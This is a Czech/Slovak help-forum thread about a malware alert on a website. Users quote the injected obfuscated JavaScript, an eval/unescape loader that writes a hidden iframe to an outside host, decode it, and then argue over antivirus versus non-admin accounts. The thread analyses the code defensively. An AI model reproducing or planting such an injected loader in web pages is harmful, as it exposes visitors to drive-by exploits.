Vir na stránkách ?

A ktory antivirus? Mne nod nehlasi nic...

Avast

Není to planý poplach ?? Je tam nějaký iframe, a myslí si, že to je vir ??

Nevidí sa toto ?

<Script>
<!--
eval( unescape( "%69%66%28%21%6d%79%69%61%29%7b%64%6f%63%75%6d%65% 6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65 %28%20%27%25%33%63%25%36%39%25%36%36%25%37%32%25%3 6%31%25%36%64%25%36%35%25%32%30%25%36%65%25%36%31% 25%36%64%25%36%35%25%33%64%25%36%33%25%33%32%25%33 %36%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%2 5%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33% 61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25 %32%65%25%36%36%25%37%35%25%36%61%25%36%39%25%36%3 6%25%36%66%25%37%32%25%36%62%25%32%65%25%36%33%25% 36%66%25%32%65%25%36%61%25%37%30%25%32%66%25%33%66 %25%32%37%25%32%62%25%34%64%25%36%31%25%37%34%25%3 6%38%25%32%65%25%37%32%25%36%66%25%37%35%25%36%65% 25%36%34%25%32%38%25%34%64%25%36%31%25%37%34%25%36 %38%25%32%65%25%37%32%25%36%31%25%36%65%25%36%34%2 5%36%66%25%36%64%25%32%38%25%32%39%25%32%61%25%33% 31%25%33%34%25%33%36%25%33%33%25%33%32%25%32%39%25 %32%62%25%32%37%25%33%33%25%36%33%25%33%38%25%36%3 5%25%36%32%25%36%31%25%33%31%25%33%36%25%33%33%25% 33%38%25%33%38%25%36%32%25%32%37%25%32%30%25%37%37 %25%36%39%25%36%34%25%37%34%25%36%38%25%33%64%25%3 3%31%25%33%32%25%33%34%25%32%30%25%36%38%25%36%35% 25%36%39%25%36%37%25%36%38%25%37%34%25%33%64%25%33 %31%25%33%31%25%33%38%25%32%30%25%37%33%25%37%34%2 5%37%39%25%36%63%25%36%35%25%33%64%25%32%37%25%37% 36%25%36%39%25%37%33%25%36%39%25%36%32%25%36%39%25 %36%63%25%36%39%25%37%34%25%37%39%25%33%61%25%36%3 8%25%36%39%25%36%34%25%36%34%25%36%35%25%36%65%25% 32%37%25%33%65%25%33%63%25%32%66%25%36%39%25%36%36 %25%37%32%25%36%31%25%36%64%25%36%35%25%33%65%27%2 9%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65% 3b" )); var c266c98cc9;
//-->
</Script>

Ktože vie čo to je ?

Je to Javascriptem escapovaný tento kód:

if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%66%75%6a%69%66%6f%72%6b%2e%63%6f%2e%6a%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%34%36%33%32%29%2b%27%33%63%38%65%62%61%31%36%33%38%38%62%27%20%77%69%64%74%68%3d%31%32%34%20%68%65%69%67%68%74%3d%31%31%38%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;

A ještě jednou provedeme unescape:

<iframe name=c26 src='www.fujifork.co.jp/?'+Math.round(Math.random()*14632)+'3c8eba16388b' width=124 height=118 style='visibility:hidden'></iframe>

Můžeš si to vyzkoušet např. na této stránce:
http://www.linkedresources.com/tools/unescaper_v0. 2b1.html

Mě,coby lamu zajímá,jestli tam mohu vlézt

Je tam hidden iframe takze tam nelez. Ci to je skodne alebo nie tazko povedat zavisi od toho ci je na tom linku kam to vedie nejaky exploit. Podla toho linku to snad je len nejaky popup, ale moze to byt aj exploit na nieco (moze to byt nebezpecne).

AVG 8.5.339 taktně mlčí...

Je tam neco v iframe, ale dekodovat to nedokazu, protoze tomu nerozumim. Pak ze neni AV potreba... Zrovna vcera jsem tohle resil na jinych stankach a na podpore dvou AV spolecnosti mne bylo jasne receno, ze na stranku s necim podobnym se nema lezt ani s user uctem. No a dopredu nikdo samozrejme nema sanci predpokladat, ze nejaky takovyhle smejdy budou i na obycejnych a v podstate duveryhodnych strankach.

na podpore dvou AV spolecnosti mne bylo jasne receno, ze na stranku s necim podobnym se nema lezt ani s user uctem.

Ono se tam nemá lézt ani s antivirem, ale o tom se už nezmiňovali...

Co se teda podle tebe muze stat kdyz tam vlezu s AV? Me tam AV nepusti, takze tam nelezu, ale samozrejme muzu kliknout na povolit a jsem tam, ale nezkousel jsem to, protoze nevim co to umi. Podle myho ani nemeli potrebu mne rikat, abych tam nechodil, protoze jeden AV me tam nepustil a NOD ani nevedel, ze tam neco spatneho je, takze to nevedeli ani na podpore. Jinak jako na vseobecny dotaz samozrejme rekli nechodit ani v pripade user uctu obe dve podpory.

Co se teda podle tebe muze stat kdyz tam vlezu s AV?

Vždyť to sám píšeš, něketré antiviry to ani nepoznají. Takže riziko admin účet + antivir je opět vyšší než user účet a bez antiviru. (Nikdo mi nezakazuje ani user účet + antivir.)

Není jasné, jestli je to exploit, a pokud to vůbec je exploit, jen málo nejzákeřnějších exploitů dokážou přes (nepatchovanou!), a často ještě jinou chybu elevovat práva na SYSTEM přes buffer overflow. Běžný buffer overflow vykoná kód ve stejném oprávnění jako browser, takže to nic neudělá. Spoustu známých exploitů pod neadminem prostě jen shodí browser.

Z toho vyplývá že nejúčinnější opatření co můžu dělat je nebýt admin. Vše ostatní je navíc (patchovat, mít antivir...) ne obráceně.

Nepisu, mne jde konkretne o to, co se muze stat, kdyz vlezu pres varovani AV na takovou stranku. To me zajima. Nejak chapu to, co jsi napsal, ale sam pises, ze spousta exploitu jen shodi browser, ale co jina spousta tech zbylych smejdu?

No mne z toho bohuzel nevyplyva, ze jediny nejucinnejsi je byt user, kdyz to riziko, ze to neco udela tam je i pres to, ze jsem user (nikdo nevi co presne to udela, dokud to nezanalyzuje nejaka AV firma, protoze jsem se uz potkal se spoustou zavirovanych stranek, ktere mely ruzne varianty techto podobnych viru a vsechny detekoval pouze Kaspersky, Nod a Symantec, ktere jeste mam - samozrejme ne na jednom pc, na to vubec nereaguji).

Kdyz jsem user bez AV, tak to proste chytnu, at uz to udela jakoukoli skodu.
Kdyz jsem admin s AV, ktery to zachyti, tak jsem relativne v klidu, takhle to beru ja a to je pro me dulezite - vysledek, a je mne jedno jak ho dosahnu. Samozrejme vim, ze si myslis neco jine, ale me o zbytecnosti AV nepresvedcis. Prave na techto, na prvni pohled bezpecnych strankach se o tom presvedcuju. Druha vec je to, ze opravdu jen malo AV tohle umi detekovat, ale to uz je jina otazka.
Jestli patchovanim myslis aktualizace, tak ty nepomuzou k tomu, aby se mne to do pc nedostalo, mozna nektera z nich muze mit vliv na to, ze zrovna tento konkretni smejd nic neudela anebo ze udela mensi skodu, ale na dalsi spousty techto druhu smejdu, ktere se hodne rozmahaji, to nebude mit vliv. Staci totiz na ty stranky vlezt a bez AV, ktery to detekuje vubec nevis, ze mas neco shnileho v PC.

Já tě nepřesvědčuju o zbytečnosti antiviru, to ty mě přesvědčuješ o jeho nezbytnosti. Podstatné sdělení je, že kdo browsuje jako admin je..., hovádko boží.

Jasně píšu že když jsem user, nikdo mi nebrání mít antivir.

Chápu že viry jsou pro tebe něco tajemného od čeho máš antivir, ale co když to řeknu takhle polopaticky: jsou "šmejdi", jak ti říkáš, a dokonce jich je tohoto typu velká většina, které když jsi admin, ti zavirují počítač, a když jsi user, jen to shodí prohlížeč. Je toto srozumitelné?

Nejhorší je, že lidi si myslí, že když mají antivir (nebo dokonce několik), že je ochrání od všeho zlého...

A ne ??

Ne

Jo !!

[minipidiskoroneviditelnípísmenka]
i to první byla ironie
[/minipidiskoroneviditelnípísmenka]

Vždyť to je přeci proti těmhlectěm virům, jinak by to neprodávali no ni?

No konkretne ted ne, ale jinak tady vedete celkem slusnou masaz za to, ze je AV zbytecnost a ze staci user ucet bez AV. No ale jak je videt, tak dnes uz to nestaci.
Sorry, ale nepripadnu si jako hovadko bozi a browsuju jako admin a zustane to tak. Nehodlam se hodiny stourat ve win, abych zjistoval proc to nebo ono v user uctu nejede, opravdu je pro me jednodussi a rychlejsi kdybych nahodou neco tezkyho chytil, udelat obnovu celyho systemu a je po starostech. Pro pripadny problem mam AV a pro pripad krize, mam zalohu Ghostem, ale kvuli viru jsem ji jeste tusim nikdy nemusel pouzit, vetsinou neco rozdrbal jiny program nebo samotne win po aktualizacich atp. No a jestli hovadko bozi smeruje i na me, jako ze asi jo, tak mne jako hovadko bozi pripada clovek, ktery druheho za hovadko oznaci pouze ze sveho presvedceni a mozna i z nenavisti ke vsemu co ma v sobe slovo AV nebo admin. Nechci se s tebou hadat a tak to radsi z me strany ukoncuji.
Podstatne sdeleni k tvemu reseni user bez AV muzu rict jen to, ze pokud bych se tim ridil, tak uz dnes mam neco v pc a to bych nelezl na zadne porno a ani na jinak pochybne stranky. Samozrejme ale musim dodat, ze pokud bych byl nahodou na druhym pc, kde je Nod, tak bych to v pc mel taky.

Poslednimu odstavci rozumim, ale nikde z nej neplyne to, ze na user uctu by nemel mit clovek AV. Samozrejme snad krom toho, pokud to neni profik.
Chapes spatne, viry pro me nejsou nic tajemneho, ale bohuzel realneho a snazim se jim prave za pouziti AV zabranit dostat se do pc a jak rikam, na porno, warez atd., nelezu. Verim, ze je spousta viru, ktere ti v pripade admin prav zaserou pc vic, nez kdyz jsi user, ale v tomto pripade to pravdepodobne neplati. A ac pravdepodobne win rozumis, vis o cem mluvis a da se ti v nekterych oblastech verit, tak v oblasti viru, ti ja osobne neverim zdalek tolik, jako lidem z viry.cz nebo z tech. podpory AV. Tim samozrejme nemyslim ty "poloautomaty", na ktere se po zvednuti tel. prvne dostanes. To myslim bez jakekoli urazky. Proste nase nazory jsou v tomto naprosto rozdilne a taky takove zustanou. Pokud bych to nemel podlozeno a vyzkouseno na svem pc a jen bych teoretizoval, tak bych ti mozna i uveril, ale bohuzel zkusenosti mam jine a jsem rad, ze AV mam.

jinak tady vedete celkem slusnou masaz za to, ze je AV zbytecnost

Já mluvím za sebe, ne za jiné členy poradny a za sebe tvrdím jen to, že antivir není zbytečnost a v kombinaci s uživatelským účtem to může, a nemusí být, užitečný nástroj. Jsem toho názoru že prostý user účet je efektivnější než libovolný antivir pod admin účtem. Ostatně to dokazuje právě existence viry.cz - všichni ti zavirovaní chudáci co tam lezou mají admin účet a antivir.

Poslednimu odstavci rozumim, ale nikde z nej neplyne to, ze na user uctu by nemel mit clovek AV

Ano, to neplyne. Ale jestli ti z toho nevyplývá i to, že bys měl mít user účet, je něěco špatně.

mne jako hovadko bozi pripada clovek, ktery druheho za hovadko oznaci pouze ze sveho presvedceni a mozna i z nenavisti ke vsemu co ma v sobe slovo AV nebo admin

Tak jinak a ostřeji. Kdo jezdí jako spolujezdec bez pásů je debil. Přesto se najdou lidi co se budou obhajovat, že jedou jen kousek a nechce se jim a kdesi cosi. (a taky se jim nic nestalo blablabla...) Tohle je úplně stejné, jako kdyby mě teď někdo obvinil, že miluju pásy a proto jim říkám ,že jsou debilové.

Podstatne sdeleni k tvemu reseni user bez AV muzu rict jen to, ze pokud bych se tim ridil, tak uz dnes mam neco v pc a to bych nelezl na zadne porno a ani na jinak pochybne stranky. Samozrejme ale musim dodat, ze pokud bych byl nahodou na druhym pc, kde je Nod, tak bych to v pc mel taky.

Samozřejmě že měl. Já ale za to nemůžu že nepatchuješ OS/browser, lezeš všude jako admin a na účtech nemáš hesla...

Jestli tě to uklidní, tak standardně spuštěný browser (ff se musí spustit s přepínačem zón internetu) nedovolí spustit kód, viz. má odpověď podemnou. Různorodý AV bude v 90% tvrdit, že se nic neděje.

EDIT// po sérii dotazů na av jsem si dneska nainstaloval avg, po řádcích nebezpečně vyhlížejících sušenek mi jako perlu označil OperaTor jak trojan. Už letěl z disku(avg ne cibulovitá operka).

(ff se musí spustit s přepínačem zón internetu)

Co to???

http://www.dslreports.com/forum/r20667404-Firefox- 3-honors-Windows-Security-Zones

Předpokládám, že to ctí celý zóny.
ËDIT// hlavně po mě nechtěj nějaký detaily, nemíním to zjišťovat, ff není můj obor. Možná se taky mýlím.

vedete celkem slusnou masaz za to, ze je AV zbytecnost a ze staci user ucet bez AV

Ještě jinak - AV je zbytečnost a user účet taky. Člověk by si jinak ani nevydělal, kdyby semtam nelikvidoval nějakýho vejra, takže - jen houšť a větší kapky

moc to neroztrubuj a nezapomeň na mých deset procent ze zisku...

Zvláštní.
IE v kódu ten element ukáže.
Maxthon3 na webkitu taky.
Maxthon2 to rovnou vymaže - vůbec se stím nepárá (nikde to tam nemůžu najít).
----
Všechny tři prohlížeče to standardně blokují(dva pomocí zón internetu).

Stalo se ti něco podobného jako mě
http://pc.poradna.net/q/view/374750-tip-udelejte-s i-zalohu-souboru-na-hostingu

já ty viry snad přitahuji,co je zase tohle ?

Furt to stejný...

Už mě to nebaví,co zas tohle ?

iframe ??

dyt to tam i vidis ze to je IFRAME....................

A proč to píšeš mě ??